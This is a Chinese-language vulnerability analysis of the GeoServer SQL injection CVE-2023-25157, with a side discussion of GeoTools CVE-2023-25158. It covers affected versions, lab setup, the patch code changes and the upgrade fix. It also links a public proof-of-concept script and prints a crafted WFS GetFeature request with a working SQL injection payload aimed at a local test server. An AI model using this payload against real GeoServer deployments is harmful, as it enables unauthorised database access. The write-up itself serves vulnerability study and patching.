簡介
GeoServer是一個開源的地圖伺服器,它是遵循OpenGIS Web伺服器規範的J2EE實作,通過它可以友善的将地圖資料釋出為地圖服務,實作地理空間資料在使用者之間的共享。
影響版本
geoserver<2.18.7
2.19.0<=geoserver<2.19.7
2.20.0<=geoserver<2.20.7
2.21.0<=geoserver<2.21.4
2.22.0<=geoserver<2.22.2
環境搭建
安裝方式有多種可以選擇
windwos下載下傳安裝
https://sourceforge.net/projects/geoserver/files/GeoServer/2.22.0/GeoServer-2.22.0-winsetup.exe/download
下載下傳後隻需要指定端口直接下載下傳可完成安裝
war包安裝
tomcat下載下傳位址
https://dlcdn.apache.org/tomcat/tomcat-8/v8.5.90/bin/apache-tomcat-8.5.90-windows-x64.zip
geoserver下載下傳位址
https://sourceforge.net/projects/geoserver/files/GeoServer/2.23.1/geoserver-2.23.1-war.zip
解壓下載下傳後的檔案geoserver-2.15.1-war.zip,得到geoserver.war
把此geoserver.war檔案拷貝到tomcat根目錄下的webapps檔案夾下。
啟動tomcat
通路路徑,預設端口為8080,端口根據自己的需求開放即可,這裡我開放的端口為8081
http://localhost:8081/geoserver/web/
分析
POC下載下傳連結
https://github.com/win3zz/CVE-2023-25157
python3 CVE-2023-25157.py http://localhost:8081
檢視送出的更新檔分析一下漏洞
https://github.com/geoserver/geoserver/commit/145a8af798590288d270b240235e89c8f0b62e1d
修改了配置檔案src/community/jdbcconfig/src/main/java/org/geoserver/jdbcconfig/internal/ConfigDatabase.java
重新添加了子產品org.geoserver.jdbcloader.JDBCLoaderProperties子產品用于配置檔案jdbcconfig/jdbcconfig.properties中的 JDBCConfig 子產品
屬性字段并更改了構造函數以包含此屬性字段。這允許對資料庫配置進行更多自定義,進而可能允許增強安全措施。NamedParameterJdbcTemplate是 Spring Framework 提供的一個類,它添加了對使用命名參數對 JDBC 語句進行程式設計的支援,而不是使用經典占位符 ('?') 參數對 JDBC 語句進行程式設計
【----幫助網安學習,需要網安學習資料關注我,私信回複“資料”免費擷取----】
① 網安學習成長路徑思維導圖
② 60+網安經典常用工具包
③ 100+SRC漏洞分析報告
④ 150+網安攻防實戰技術電子書
⑤ 最權威CISSP 認證考試指南+題庫
⑥ 超1800頁CTF實戰技巧手冊
⑦ 最新網安大廠面試題合集(含答案)
⑧ APP用戶端安全檢測指南(安卓+IOS)
public ConfigDatabase(
JDBCLoaderProperties properties,
DataSource dataSource,
XStreamInfoSerialBinding binding) {
this(properties, dataSource, binding, null);
}
public ConfigDatabase(
JDBCLoaderProperties properties,
final DataSource dataSource,
final XStreamInfoSerialBinding binding,
CacheProvider cacheProvider) {
this.properties = properties;
this.binding = binding;
this.template = new NamedParameterJdbcTemplate(dataSource);
通過使用參數化查詢而不是字元串連接配接
src/community/jdbcconfig/src/main/java/org/geoserver/jdbcconfig/internal/OracleDialect.java在插入中做了修改
//sql.insert(0, "SELECT * FROM (SELECT query.*, rownum rnum FROM (\n");
//sql.append(") query\n");
sql.insert(
0,
"SELECT * FROM (SELECT query.*, rownum rnum FROM ("
+ (isDebugMode() ? "\n" : ""));
sql.append(") query");
appendIfDebug(sql, "\n", " ");
修改了插入文法,其方法在src/community/jdbcconfig/src/main/java/org/geoserver/jdbcconfig/internal/Dialect.java
中定義
public boolean isDebugMode() {
return debugMode;
}
public void setDebugMode(boolean debugMode) {
this.debugMode = debugMode;
}
/** Escapes the contents of the SQL comment to prevent SQL injection. */
public String escapeComment(String comment) {
String escaped = ESCAPE_CLOSING_COMMENT_PATTERN.matcher(comment).replaceAll("*\\\\/");
return ESCAPE_OPENING_COMMENT_PATTERN.matcher(escaped).replaceAll("/\\\\*");
}
/** Appends the objects to the SQL in a comment if debug mode is enabled. */
public StringBuilder appendComment(StringBuilder sql, Object... objects) {
if (!debugMode) {
return sql;
}
sql.append(" /* ");
for (Object object : objects) {
sql.append(escapeComment(String.valueOf(object)));
}
return sql.append(" */\n");
}
/** Appends the objects to the SQL in an comment if debug mode is enabled. */
public StringBuilder appendComment(Object sql, Object... objects) {
return appendComment((StringBuilder) sql, objects);
}
/** Appends one of the strings to the SQL depending on whether debug mode is enabled. */
public StringBuilder appendIfDebug(StringBuilder sql, String ifEnabled, String ifDisabled) {
return sql.append(debugMode ? ifEnabled : ifDisabled);
}
擷取功能名POC
GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1
Host: 10.10.12.35:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=node0iyysq0tt08lup1gy571ox3id1.node0
Upgrade-Insecure-Requests: 1
擷取功能屬性POC
GET /geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=ne:coastlines&maxFeatures=1&outputFormat=json HTTP/1.1
Host: 10.10.12.35:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=node0iyysq0tt08lup1gy571ox3id1.node0
Upgrade-Insecure-Requests: 1
構造惡意payload
GET /geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=ne:coastlines=strStartsWith%28scalerank%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+INTEGER%29%29+--+%27%29+%3D+true HTTP/1.1
Host: 10.10.12.35:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=node0iyysq0tt08lup1gy571ox3id1.node0
Upgrade-Insecure-Requests: 1
這裡引用一張圖,geotools的注入漏洞
漏洞編号CVE-2023-25158,檢視更新檔發現
在類中添加該escapeBackslash字段modules/library/jdbc/src/main/java/org/geotools/data/jdbc/FilterToSQL.java是一種預防措施,可防止某些形式的 SQL 注入,其中反斜杠字元用于轉義 SQL 文法中的特殊字元
// single quotes must be escaped to have a valid sql string
String escaped = escapeLiteral(encoding);
調用類escapeLiteral()中的方法EscapeSql.java。此方法旨在不僅轉義單引号,還轉義反斜杠,并可能根據其參數轉義雙引号
public static String escapeLiteral(
String literal, boolean escapeBackslash, boolean escapeDoubleQuote) {
// ' --> ''
String escaped = SINGLE_QUOTE_PATTERN.matcher(literal).replaceAll("''");
if (escapeBackslash) {
// \ --> \\
escaped = BACKSLASH_PATTERN.matcher(escaped).replaceAll("\\\\\\\\");
}
if (escapeDoubleQuote) {
// " --> \"
escaped = DOUBLE_QUOTE_PATTERN.matcher(escaped).replaceAll("\\\\\"");
}
return escaped;
至于為什麼會聊到CVE-2023-25158,這裡就要聊到Geoserver和Geotools的關系了,可以參考這篇文章
https://blog.csdn.net/nmj2008/article/details/113869086
修複方案
更新安全版本,目前已經有最新版本。